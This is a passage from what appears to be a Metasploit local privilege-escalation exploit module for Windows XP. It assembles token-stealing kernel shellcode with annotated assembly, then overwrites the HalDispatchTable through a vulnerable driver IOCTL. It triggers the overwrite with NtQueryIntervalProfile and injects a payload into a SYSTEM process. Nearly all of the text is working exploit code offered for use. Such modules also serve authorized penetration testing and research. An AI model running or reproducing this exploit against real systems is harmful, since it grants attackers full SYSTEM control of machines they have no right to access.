"\x00\x00\x00" # mov ebx, dword ptr [eax+0C8h] # Retrieves TOKEN tokenstealing << "\x8b\x80" + target['_APLINKS'] + "\x00\x00\x00" # mov eax, dword ptr [eax+88h] <====| # Retrieve FLINK from ActiveProcessLinks tokenstealing << "\x81\xe8" + target['_APLINKS'] + "\x00\x00\x00" # sub eax,88h | # Retrieve _EPROCESS Pointer from the ActiveProcessLinks tokenstealing << "\x81\xb8" + target['_UPID'] + "\x00\x00\x00\x04\x00\x00\x00" # cmp dword ptr [eax+84h], 4 | # Compares UniqueProcessId with 4 (The System Process on Windows XP) tokenstealing << "\x75\xe8" # jne 0000101e ====================== tokenstealing << "\x8b\x90" + target['_TOKEN'] + "\x00\x00\x00" # mov edx,dword ptr [eax+0C8h] # Retrieves TOKEN and stores on EDX tokenstealing << "\x8b\xc1" # mov eax, ecx # Retrieves KPROCESS stored on ECX tokenstealing << "\x89\x90" + target['_TOKEN'] + "\x00\x00\x00" # mov dword ptr [eax+0C8h],edx # Overwrites the TOKEN for the current KPROCESS tokenstealing << "\x5b" # pop ebx # Restores ebx tokenstealing << "\x5a" # pop edx # Restores edx tokenstealing << "\xc2\x10" # ret 10h # Away from the kernel! shellcode = make_nops(0x200) + tokenstealing this_proc.memory.write(0x1, shellcode) this_proc.close print_status("Triggering vulnerable IOCTL") session.railgun.ntdll.NtDeviceIoControlFile(handle, 0, 0, 0, 4, 0x1965020f, 1, 0x258, halDispatchTable + 0x4, 0) result = session.railgun.ntdll.NtQueryIntervalProfile(1337, 4) unless is_system? print_error("Exploit failed") return end proc = get_system_proc print_status("Injecting the payload into SYSTEM process: #{proc['name']}") unless execute_shellcode(payload.encoded, nil, proc['pid']) fail_with(Failure::Unknown, "Error while executing the payload") end end end